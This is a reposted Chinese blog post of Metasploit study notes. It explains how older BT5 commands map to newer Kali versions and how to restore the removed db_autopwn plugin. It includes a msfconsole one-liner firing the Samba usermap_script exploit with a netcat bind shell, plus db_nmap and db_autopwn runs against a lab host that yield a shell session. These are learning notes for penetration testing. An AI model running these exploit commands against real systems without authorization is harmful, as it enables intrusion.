metasploit学习笔记2
来源:互联网 发布:js遍历数组foreach 编辑:程序博客网 时间:2024/06/04 23:25
1.阅读老资料的困惑
老资料里一般是根据BT5整理的,kali里的metasploit比较新,不太一样,这里整理一下。
a)msfcli被整合进msfconsole的参数里:
老指令:
#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E
新指令:
#msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST 192.168.200.129; set PAYLOADcmd/unix/bind_netcat; [set LHOST IP;] run"
b)msfpayload、msfencode被整合到msfvenom里:
老指令:
msfpayload -l #查看所有攻击载荷
msfencode -l #查看所有编码器
新指令只需一条指令即可:
msfvenom -l payloads,encoders
下图是msfvenom的参数说明:
c)db_autopwn自动渗透脚本被删除
据说是由于该脚本虽然使渗透傻瓜化,但是智能不高,并且造成的负载不小,容易被发现,所以删掉了。
目前替代的方法是可以使用metasploit的一些自动化插件和脚本,但是更好的方法还是自己选择合适的脚本和载荷,使负载变小,效率更高。
https://github.com/rapid7/metasploit-framework/tree/master/plugins
2.db_autopwn傻瓜化测试
虽然db_autopwn被删掉了,但是可以手工恢复。
https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
源代码复制下来,保存为db_autopwn.rb文件,复制到/usr/share/metasploit-framwork/plugins/中,然后执行加载
#msf>load db_autopwn
渗透测试:
a)扫描测试机
#msf>db_nmap -v -A 192.168.200.129
--测试机的扫描结果会自动存放如Postgresql数据库中
b)查看扫描结果
c)自动测试
#msf>db_autopwn -t -p -r -e ----负载不小,1000多个脚本都会跑一遍,需要不少时间,好在成功了一个session。
d)连接会话并测试
会话连接已经成功,但user是www-data(敲错的指令,请自动忽略),不是root,没关系,至少证明db_autopwn还是管用的。
转载:http://www.jianshu.com/p/6c600bf396a5
- metasploit学习笔记2
- Metasploit 学习笔记
- BackTrack5 学习笔记9 Metasploit
- metasploit --命令学习2
- metasploit渗透测试学习笔记(一)
- metasploit渗透测试学习笔记(二)
- 《metasploit渗透测试指南》学习笔记1
- 羽翼metasploit第一,二季学习笔记
- 关于Metasploit的学习笔记(一)
- 关于Metasploit的学习笔记(二)
- Metasploit学习笔记(一) 信息收集
- Metasploit笔记
- Metasploit笔记
- Metasploit笔记
- metasploit 学习
- Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
- Metasploit学习笔记之——情报搜集
- metasploit学习笔记之主机探测和端口扫描
- 等待图片加载完才加载js
- 什么是多态?为什么用多态?有什么好处?多态在什么地方用?
- Vue2.4.2源码探究之渲染过程1
- python如何对数组内的元素进行条件运算?
- 模型容量,过拟合与欠拟合(VC维与奥卡姆剃刀)
- metasploit学习笔记2
- Leetcode 189. Rotate Array
- 多级反向代理获取真实客户端IP
- Properties文件的解析
- pl/sql 连接数据库
- JSON.stringify兼容
- 基于Cache数据库的数据重复验证
- 高效读写消息队列SafeQueue
- Go 关键字 defer 的一些坑你需要踩踩